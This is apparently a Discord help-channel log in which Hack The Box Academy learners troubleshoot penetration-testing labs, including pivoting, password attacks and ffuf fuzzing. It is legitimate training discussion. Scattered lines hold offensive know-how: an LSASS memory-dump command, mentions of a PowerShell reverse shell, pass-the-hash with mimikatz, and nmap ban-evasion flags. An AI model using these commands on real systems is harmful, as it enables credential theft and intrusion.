Try pip3 install scrapy --break and then redownloading ReconSpider and unzipping it, and see if that works.
Ok thanks
Permission error... But I don't get for what.
There are no JS files on the instance.
I'm sorry, I don't know where to go from there; hopefully someone more versed can step in.
No worries, thanks for trying.
It says Requirement already satisfied.
Oh ok, sorry, I thought you still had issues with scrapy.
You should run the script from a directory you can write in. You got a permission error.
So "cd /root/Desktop" or wdym?
I would use somewhere in my home folder and not run everything as root.
Can you show me an example? When you say that I think of doing "cd /root/Desktop/(home folder)" and I feel like you're saying not to do that lol
Just "cd "
The one on the left is using the HTB-provided machine and the 2nd one is the HTB VM on my VMware.
Don't worry about the IP though.
Just restarted it, that's all.
What are the odds? I'm running LFI/Log Poisoning and someone is nmap scanning the box at the same time?
lol...
You are trying to bypass firewall rules or IPS, I can't remember, so if you change your IP your count with the firewall gets reset. With one you are blocked and not with the other.
So you're saying to reset again and try on my machine?
Yes it should work, that or a new vpn connection file. In real life, you can’t respawn another instance so you would have to scan from another IP
Curious, it comes from a local IP.
Yup, so somehow connected to someone else's instance I suppose
Is this an Academy module?
yeah
If so, it's not from a local IP, but rather it's routing through the cluster from the public IP / port IIRC
So probably just someone scanning the IP of the cluster
People scan shit 24/7
Interesting - edit Yeah, I saw the 192.168 & figured it was a local scan
So for Identifying SSRF in the SERVER-SIDE ATTACKS module, was ||using Local File Inclusion|| the intended way to get the flag? Only asking because the prompt is to "identify an internal web application"
Did you ever get the error I got? 'Cause it doesn't work, rip.
Got the same question as this; I'm banned before I get my full port scan done.
You don't need the -sV @normal panther
-sV does additional probing
As a note, I never had to use -D.
Also spoiler
The first screenshot has the flag
Has anyone finished the Windows Lateral Movement module? Got a question about a procedure that I might be making a stupid mistake
Module: metasploit
Section: Sessions and Jobs
Output claims the system appears to be vulnerable and injectable. But it does not do its process; I've refreshed the IP address, downloaded a new VPN config. Same issue.
However, if I do use the HTB Academy system it'll work, but it's slow for me, which I hate.
Btw, how would I avoid getting banned? IK I would use the -S, but sometimes an error comes with that.
Hello everyone, how are you?
I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results
What help do you need?
@edgy gale some hackers are threatening me
What are they saying?
They are saying that they will terminate my YT account; they already hacked my location and my jaaz account.
I tried but they still
Still?? Did they show you any proof?
Then you likely have something dodgy on your computer, and should reformat.
++
@edgy gale yes, they showed me that I live in Punjab.
You are from Pakistan?
Yes
Ahh, what proof have they shown?
When you say hack your jaaz account, what do you mean?
Jaaz is a bank account
Goblin, it is basically a SIM card app account.
Yes
Ok, can you recover it?
Like our bank account, it's created on the SIM.
100% he can.
Yes, I did it, I recovered it.
Right
Change passwords, enable 2FA, reformat and ignore them.
Go to the police if you want, but unlikely they will do much.
hackthebox tech support 👍
Thank God my money was saved and I changed password
Zakora, come in my DM, I will help you.
Really
hehe
Come in DM.
@young arrow Finished the Linux Fundamentals module; recommend I skip to Bash coding or do the Windows Fundamentals + Windows CLI modules?
Ok
No offense @edgy gale - but they've already been taken in by someone they don't know
The last thing we should do is encourage them to confide in someone else they don't know
yepp!
@edgy gale
Yeah, I got it.
advice? 
Have been busting my head on a double hop; if anyone can give me a nudge I'd appreciate it! It's on the WinRM section of Win Lateral Movement.
I can get in the Host, but not as the right account which should have the read permissions to the file I want.
Bro smh, I ran the exact command yesterday and it worked.
You wouldn't use -S.
Btw, this is just a question since everything is working for me, but isn't -S to manipulate the source?
So therefore we aren't banned.
same thing with the -D RND
hides our ip
-S sends a spoofed ip meaning the reply gets sent to the spoof, not to you
RND includes your IP in the random genned list
So to avoid getting banned the only way is to have a VPS set up?
Nope
I got the answer without needing to spoof or rnd
Or need a vps
Just don't overthink it tbh
Yeah, IK, it was a general question for an RL scenario: if I was to get banned, obviously I can't restart the machine.
You still wouldn't spoof
Read the documentation
On an rl engagement you'd likely limit your scan rate anyway
RL = real life?
Yes
ayt thanks boss
I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results
RND is only useful for a manual reviewer, so they can't determine which is real btw
It helps if you describe your issue
The simple thing is, are you filtering the result as described?
yeah
Don't use the exact filter from the example
I'm using this:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://83.136.249.153:37314/ -H 'Host: FUZZ.83.136.249.153:37314' -fs 900
Utilize the results you receive to modify the filter
But it is giving me the whole list as results.
Dude... you need a vhost for this IIRC.
hmm
inlanefreight.htb from what I recall
It tells you above the questions what's needed
Can you tell me about this?
Breathe, Marcie... breathe...
Read the question
It tells you the domain to fuzz against
Yeah, I have read it. Can you tell me if there is any mistake in the command that I have written?
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
Your -H is wrong
Your -H should be -H "host: FUZZ.academy.htb"
I have also tried without writing the port in -H, but no better result.
That's what's wrong with it
ok lemme check
You don't put the ip at all in the host header
See the last example
-u http://Academy.htb:port from the example only works if you have it in your hosts file
Yeah, I have it in the /etc/hosts file.
Hosts file shouldn't have the port
That's by far the most common mistake
But you can also do http://ip:port as the only thing that truly matters is the host header
yepp i know
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:37314/ -H 'Host: FUZZ.academy.htb' -fs 900
Is it correct now?
yeah
Then just be patient
But it still gives me all the wordlist entries as vhost results.
Then adjust your filter size
Use the most common response size for your filter
that is 200
Gotta be smarter than the tool you're using
I have tried it, but it still gives me everything as results.
Ok and?
That's not the response size btw
That's the response code
yeah
Response size is listed after size:
Yeah, that is the response code/status.
Since -fs filters out by size that's what you use
I'm trying to tell you but you're not listening lol
Oh, that may be a mistake.
Oh, I got it now.
Hey, yes. What I mean is if your command worked with the PwnBox it should work from your VM, but like Marcie said, there was stuff not needed in your command. You should always try to strip down the command you use to the bare minimum.
So what status code do I have to use?
Not status code
Size
I'm telling you
It is not that they do not listen, but that they do not obey and comply lol
Change -fs 900 to another value
ok
Look at your results to find the answer
Oh, I got the result now...
Btw it's referring to the previous section for what filter size you should use and how to determine it
Thank u soooo much... i got it.
The Vhost fuzzing section is directly connected to the filtering results lab
Actually, I was thinking if I enter 900 it will filter all values in the 900 range.
I think I have to read that again.
Btw, thanks mate.
Have a good day
-fs 900 filters out ONLY result sizes of 900
hmm i got it now.
Not a range
Ranges would be x-y where x is the starting value y is the ending value
Or a list of values a,b,c,d
It helps to actually read the documentation.
It also helps to take notes
Omg... didn't realize that was the flag for this exercise. I was having trouble running dnscat2 and decided to come here to look. Found that flag and thought it was for another part of the module.
@fathom pendant
What
I want to be a member of hack the box
Ok
You don't need anyone to give you an invite, dude.
Just sign up on the website
Unless you mean staff, then you gotta apply for a job
Read #rules and shit
We aren't a hacker for hire server
this server is about the hackthebox platform
Really hurting here.... Even the shell I got in the DC is ephemeral and with little permission! 
https://app.hackthebox.com if you actually read #welcome you'd know that
We don't do hacking brigading or anything like that
We don't do that here
PIVOTING, TUNNELING, AND PORT FORWARDING
RDP and SOCKS Tunneling with SocksOverRDP
For some reason the SocksOverRDP-Plugin.dll gets removed from the victim host after 1 minute... I tried loading it while it was still there but this happened.
If anyone can help me out on the Win Lateral Movement module, I'd appreciate.
Been stuck on the same for about 6 hours
Real-time protection is running
Defender might not be on, but real-time protection is separate from that
I see.. thx
Hey @upper haven, is it ok to do a check on the Client-Side Prototype Pollution challenge from the Whitebox Attacks module? Many people are facing a lot of issues making their payloads work, and I think there are some problems in the challenge... thanks for understanding, buddy.
#1234357888114364508 is the best place for that feedback
The password is the answer to the previous question
It's the same setup as the previous questions
It also helps to give the module and section name
I see, 'cause even after a restart I got the same thing. I just moved on from it now; perhaps I needed to update my nmap.
Nah the medium lab is just weird like that
You can likely get it if you connect to it directly
I tried Pass-The-Ticket but I am not able to progress any further.
You will not understand.
Can't find you on Google. Also this isn't a place for this. If you wanna hire someone, post a job offer on some platform
Somebody help!
Also, I am not able to find the compiled binary for Rubeus. The GhostPack repository just contains the source code on its release page. I found the Ghostpack-CompiledBinaries repo, but when I try to execute it, I get an error:
The .NET version on the M* server is v4.0.30319. The repo contains binaries for various .NET versions, but not 4.0.3. I tried all the available versions. They give the same error.
https://academy.hackthebox.com/module/77/section/726
This hint wasn't very useful 
Can anyone help?
Get the precompiled version.
Use a wordlist
You are welcome.
makes sense, ty
Where?
Thanks
Any way to speed this up?
Timing options or set rates
So let's say -T5, will that work with proxychains as well?
After 8 hours and battling with the PwnBox, I finally finished the section, and I think it wasn't via the expected path.
Took ligolo-ng for the tunnel, netexec with a module, Rubeus and PSRemote.
Couldn't tell if proxychains is rate limited. Really don't know, but my normal nmap is always set to a higher rate, independent of whether I'm proxying or not.
Got crackmapexec to work, thanks! Hopefully it doesn't take the entire day to get it.
You just need to RDP and PSRemote.
@next bronze more hints please
which question again?
Crack this user's password hash and submit the cleartext password as your answer.
10th question
yep, capture and crack
Tried that already 😭
I have not got any kind of access to DC01 yet
Chisel/proxychains isn't working properly on the PwnBox. I've commented earlier.... It worked fine on bare metal with the VPN though.
I guess I'm stubborn and kept trying with it and to pivot without RDPing into SRV02.
I got Remote PowerShell access on DC01 as 'Helen', but it was too ephemeral and broken; also, the Domain Controller would not auth 'Leonvqz'.
I had to resort to ligolo-ng again to get internal network access....
You can just double RDP; the creds from the previous sections give you RDP access to both SRV hosts.
Haven't thought of that. Initial approach was to PtH with the provided NTLM hash
Did you manage to capture a hash for the user in Q9?
Thought that since I had PSRemote on SRV02, I could at least execute commands remotely on DC01.
This is what got me a shell as 'Helen'. I executed a base64 PowerShell reverse shell with Invoke-Command.
Should be doable :-)
Yeah, that's the double hop thing: WinRM doesn't store creds in memory, so you'll need to give plaintext creds if you're already in a session.
I think the section did mention that
Yes.... but since I got only the NTLM hash for the other user, I tried to PtH with mimikatz and execute a reverse shell file, but since it kept breaking, it would not execute or it was opening a bunch of windows in the DC which I would not see nevertheless. 😅
Q9?
yes the answer of Q9 is the username of the user you need
No
Thats the question I am stuck on
I know the username from BloodHound enum.
But no password
I'm doing the Network Services RDP question in the Password Attacks module. I solved all the other questions but I'm stuck on it... hydra is taking too long and it's printing out every attempt; I tried -t 4.
Can I DM you?
Use Inveigh.
Hello @everyone, if I downgrade my subscription to Student from Platinum, will I get a refund?
@fathom pendant do you know that ?
@ everyone doesn't work btw
Message support
Where did you mean, the support AI?
The website support, yes
There is no support on the discord
I wrote, but I didn't get an answer from the AI.
I don't see why you'd get a refund instead of just a downgrade on your next renew
But as marcie said, contacting sup would be a better idea
There are actual agents in the support chat, they will be coming online soon
Then be patient
Actual human beings answer those questions at times
NO I mean it gave me the wrong answer
Yes I want to talk with human
How do you know its the "wrong" answer
oh well
Then message the bot again
imma try to get a cake recipe from it later then
Support doesn't monitor the discord
Because it gave me a manual, but there's no answer there.
I said
Discord isn't the place for support.
Also you can't post images bc your account isn't linked
I knew thanks
Anyway. Just try again
What does that mean?
got you, one sec
your HtB account isnt linked to your discord account
https://account.hackthebox.com/security-settings
Scroll down, and click that Discord button
How can I connect?
IDK what yours will say, 'cause mine is already connected.
in the site settings
here
this one
thanks
yw
That does nothing afaik; you still gotta link via the #welcome method
can anyone help btw?
Unless they recently made it do something
oh thats weird
Hydra shouldn't be printing every attempt afaik
It says "account on ip might be valid but not active for remote desktop".
Did I connect now, bro?
Rdp is a weird one afaik
not yet
ye
But I connected, how so? I checked the settings, also good.
You should have a role.
And you're using the username and password list from the resources?
like me
yea
It's just taking too long, 1-2 hours and I'm still at sysadmin, which is like at the first 3-7 users or something.
I suggest maybe resetting target/changing vpn region
alr
It shouldn't take 2 hours
I do this but add -t 4.
Default rdp is 4 threads
sry that might be an exaggeration, i think its only 1 hour
So you don't need to specify
Even an hour
Most of the password tasks should take at most 20 minutes.
Yeah that is odd
My terminal is filled like that xd
Like I said. Reset target or even change vpn region
alr
@nova ginkgo can you please DM me your registered email address or the username on the HTB Academy platform?
Is this really how a module should be completed?
Wouldn't it be effective to take notes right away after each section in a module?
It's entirely up to you. What they show is a recommendation that you can choose to follow.
Pivoting module - Skills Assessment
https://academy.hackthebox.com/module/158/section/1441
"In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"
I found the correct username while listing directories in C:\Users however I don't think that was the right way to do it, and now I'm wondering if I missed out on something. I can't view the hint anymore.
6 and 7 imo would be the better things to practice
That's a way to do it
There's no "incorrect" way
And C:\users is one of the first places to explore
Alright, but I don't understand what is meant by "exposes the users credentials and the network as a whole".
Where would they else be exposed? SMB?
Going over the module once it's completed is not really effective for paced learning, but it's alright I'd say. How is making non-technical documentation beneficial for us?
We understand jargon.
This is not a pentest report.
The report for the exams requires it.
So practicing "dumbing down" the explanation is good practice
It also helps cement a general idea of the attack
Ahh, they make us do it. That was not the case with CDSA, right?
IDK, haven't done it.
But I'm assuming the same reporting concept applies
You have the report portion for executives, and the portion for the technical people
Following this, it'll take me around 6 months to complete the CPTS path.
It might be. I'm unemployed currently, just finished college.
It just helps with understanding overall as a "can you explain this to someone that doesn't know tech"
Ok and?
Same, but I was kicked from uni also xD
now that's what i'd call art.
It would look bad on a resume, like a break, if I don't take the exam.
It gets you shortlisted and recognised; then your further knowledge gets you the job.
Not really
How would it make you look bad lol
I finished college, you were kicked, lmao. How is that the same? Kidding.
Either way. The only way to look bad on your resume is if you make yourself look bad
IDK, I did the SOC Analyst path, took me 6 months (3 months I was very sick). I don't think employers here even recognise the HTB stuff in my resume.
Well, CDSA is only like 1 year old, and CPTS is gaining traction.
Here, everyone's obsessed with EC-Council.
CEH is king in some countries
It's weird, I'm prepping for the CEH Practical exam while learning through the toughest possible path.
In mine, it really is.
Do you want to continue the convo anywhere else? I'm in.
Nah
Alright. Is it weird though?
this
Where does evil-winrm download files if the path is not specified?
It needs the full path IIRC.
Yeah, one of the quirks of evil-winrm is that it requires the full path to be specified.
Not really... it downloaded the file into the directory from where it was started.
I couldn't find the file because I hadn't downloaded it.
You couldn't find the file because you didn't specify the full path, I guess.
I have a question! If I'm doing a module that costs 10 cubes and it says +10 on this module, do I get my cubes back + 10 cubes, or do I just get +10 to have the same number of cubes?
I just tested and the file was downloaded in the directory from where evil-winrm was started.
You get back to the same number of cubes.
Okay, but how can I earn more cubes to do harder modules? Do I have to pay?
There are modules that offer you some rewards in cubes.
Yes, when you run out of cubes, you have to buy more.
yes
https://help.hackthebox.com/en/articles/5272936-introduction-to-htb-academy → Academy Cubes section
You will not go net positive in cubes on the free plan.
You will always either stay the same (T0 modules) or lose some (the rest only give 20% back).
I figured out I'd probably need to do it another way in order to (possibly) obtain the other account's password. To do that I want to dump LSASS and crack it on my attacker VM, but I'm having trouble transferring it.
My best idea was to use SCP since SSH is open - does my syntax look incorrect?
Do you have remote access via xfreerdp or something? With xfreerdp there's the /drive: mount feature, and with something like evil-winrm there's the upload/download feature.
Yes I have RDP access but unable to drag/drop or copy/paste. I will try with the drive feature - I also thought of meterpreter to download.
When doing the Attacking WordPress brute forcing with WPScan, I'm assuming in the real world there would be some kind of WAF/IP blacklisting to stop this?
Is it normal that this takes this much time? (Password Mutations section of the Password Attacks module)
The password list I got has like 90k words.
Bump up the threads
It should be faster
Even at 64 it's slow (2x faster).
Is it possible to paste something in PwnBox?
I did with meterpreter but I actually uploaded mimikatz
Because it's so annoying to write everytime
It doesn't like Firefox, but if you go to fullscreen mode there's a clipboard button.
You on a Mac by chance Vadimka?
No, I use Firefox on Windows.
But even if... you can copy text, then right-click and paste in PwnBox.
Uhh, Ctrl+C and Ctrl+Shift+V work for me.
On Chrome.
It uses its own clipboard in PwnBox.
You should be able to ping the target machine right?
doesn't work for me 
Maybe make sure this is on.
Interesting! Did you use socat for the tunneling?
Do you see a little clipboard icon in the bottom right @gilded radish ?
I'm sure I used to be able to just ctrl+c ctrl+shift+v
Nope I uploaded mimikatz using meterpreter
But I've gotta chuck it in that clipboard now
(click clipboard, enter text in to input box, then it is passed to the Pwnbox's clipboard)
I mean for the meterpreter. Did you just "follow along" with this?
^
It only appears in fullscreen mode.
Ah, I am in Chrome
Showed when I expanded to a new tab with the button
but didn't need full screen
Yeah, it's weird on FF.
Hm, weird
But it doesn't work either haha
It does: paste the stuff you want into the text box, then paste in the PwnBox terminal or whatever with Ctrl+Shift+V.
It says it is like middleware, but I still cannot paste something in.
OOOOOO
IT WORKS, OMG finally
thank you, guys
Yeah, IDK how you lived without that.
Hey, so I'm running openvpn on my Kali machine and am trying to connect to the target machine, but nothing is working. It has been like this for about a month now and I've just been completing modules in the PwnBox instance. Is there any way to fix this so I can use my local Kali machine?
48 threads is safe for this one
are you running pwnbox at the same time you're trying to use your own vm? what errors are you getting? does the ovpn connection finish? (did you reach out to support?)
Which VPN are you trying sometimes I have to shuffle around vpns to get the machine to start
No I'm just running openvpn. I can't ping, run nmap, connect to web addresses, currently working on password attack module and can't use any of the tools. openvpn gives me the sequence completed. I have not reached out to support just making sure there's nothing else I can do on my end before doing that
I've been going between us academy 5 and 6
even still should have reached out to support when it started happening so you could have figured it out then
¯_(ツ)_/¯
I will do that
also make sure the vpn is set to only use resources on its own network in the network manager settings
Wdym?
Google it, I cba to find the link rn
Basically yeah, I placed a meterpreter on the first box too and did port forwarding
Wow
Hello, any tip for the OTP part on the skills assessment for Broken Authentication.
What have you already tried?
I have no clue, I just randomly followed the steps that there's on the module OTP
Take another close look at the module.
ok
I entered my university email but it gives Unverified
Step by step guide on how to access the Student Plan.
yes I wrote but nobody replied to me
When did you write? A request like this certainly takes a few days. HTB must first check whether the information is correct.
can you check your Discord
he's not staff so he does not have the ability to verify that info
are you staff
you just have to be patient as said, it takes a few days for HTB to verify and cross-check the info
no, i'm not staff -- this is an issue to do with support, which you contacted
so be patient
you'll be notified via email when it's processed
You have to open a ticket as described here, not just contact the bot.
https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription
Step by step guide on how to access the Student Plan.
Footprinting module SMTP:
Q-> Find username that exist on server.
as you can see root and mysql are the users that are present in the smtp server, I tried both, not working.
I got mysql from enumerating
on looking at forums people advised to use the wordlist provided in resources. But idk I can't access resources when pressing it nothing happens, it doesn't download the pdf
yes and it is not downloading
On the pivoting module using dnscat2, I got an error when starting the server saying it couldn't load the file. Went to use the bathroom, ran the same command and it worked for some reason. Not sure if this comment would help someone else, but I thought I'd write it in case it does.
Not intended 😄 But not significantly easier either, so I'm not gonna patch it. Good job on finding an alternative solution! You shouldn't have any trouble finding the flag by accessing the internal web application, so feel free to try to solve the lab again the intended way 🙂
In Password Attacks module, Attacking LSASS, this command isn't doing anything
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 652 C:\lsass.dmp full
are you running powershell as admin?
Actually I wasn't, this fixed it thanks!
|| ffuf with digits text ||
can i get a little nudge here or in dm's for "footprinting medium lab"?
i found 2 creds so far, || alex, sa || tried with these users & password to smb, evil-winrm, 3389 but none of these gives me a "next step" what should i do rn?
have you tried ||xfreerdp|| too?
ah no.. thank you
What http server software is the question (without the version), and it says Apache. But that's wrong... Am I looking at the wrong thing?
What is the module and section? I vaguely remember this. It was a stupid question.
Information Gathering - Web Edition (Skills Assessment)
the question is about inlanefreight.htb and not .com
Gah, they goofed with that module since I completed it so my answers are all messed up. I think if you do some web requests and dump the headers you'll see some x-powered-by results IIRC.
I'll see if I can fire up that section and give you a clearer hint unless qui3t's answer works (I don't believe it is right).
Oooh, good catch there. Yeah that's part of it.
When I use that it said it couldn't resolve the host
you need to update your /etc/hosts file. A .htb domain is not public, it cannot be resolved by a public DNS server, so you have to tell whatever tool you are using where to look. Either by specifying the ip in your hosts file or by specifying a resolver in the command
That skill assessment is tricky, try to understand how the thing is actually working
ooooh that's right thank you. I forgot abt that
Hello guys, I just had a question (please excuse me if this isn’t the right channel ) I don’t have a windows machine, it’s important for a hacker to know both Linux as well as windows, I’m pretty good at Linux, but is there any way I could practice or learn windows?
hey, i'd say just use it : ) but otherwise htb academy has courses like Windows Fundamentals, Intro to the Windows command line, Intro to active directory. They are free iirc
Thank you.
Wow, they totally changed that info gathering - web module... that stupid question used to be about imgur.com
yeah i guess it is more in scope now as it is unlikely we will have to research in the wild for the exam
Is the integrated terminal new? I hadn't seen that before & that's a super-cool way to use the pwnbox!
Hello!
I am on the Login Brute Forcing module, Service Authentication Attacks section, part 2 Service Authentication Brute Forcing.
When trying to connect or brute force via SSH I get told that it only uses public key authentication, not password authentication, which obviously I’m supposed to find the password to login so I am very lost.
Oh did the help section get moved?
hey guys I'm doing the sqlmap skill assessment again and I know where the injectable point is, but the thing is, I can't create it like a bug in the machine
I've tried to reset it a few times
can someone talk to me in private, maybe I'm missing something
never mind
I need some help, accordingly network is unreachable meaning my metasploit attack wont work
Change vpn regions, reset target, any basic troubleshooting done?
Hey all, I'm working through API Attacks skill assessment, And I was trying to || reset supplier password for all the suppliers who has security question of favorite color||. I tried ||ffuf with https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Security-Question-Answers/html-colors.txt|| but no success. Can you let me know if this correct?
maybe the space between /p: and the password string ?
I am now getting this error. I reset the machine twice
I removed it in the next command.
sorry.
I am now getting this error
it was working an hour back. I had solved it till this point. last flag to go. I am sure that the credentials are correct
¯_(ツ)_/¯
Can someone help me with the skills assessment of Windows Event Log & Finding Evil? I just need a hint, I just don't want to text here because it's a bit crowded
@fathom pendant could you help me please, I'm doing the identifying the SSRF and port, but I'm trying to access it either via curl or burp with no success, tried to use gopher prior but it didn't work either
can't verify your password, and I don't have a note about the rdp command. But I googled your error, what about if you specify the domain xfreerdp /d:DOMAIN /u:USER then the rest of the command
wait I am doing it again. just running hydra on the creds
Any clue on mine? I did all basic troubleshooting, but it seems to be how SSH is set up on their machine
Reach out to support ig
what worked? just your previous command?
I'm not some magic wizard that has all the answers
yes. after hydra
my bad
hey are you able to ping the htb VPN server?
Wasn't talking to you
oh
Can anyone send me an Instagram or WhatsApp link or a hacking link?
Didn't even notice you @ me tbh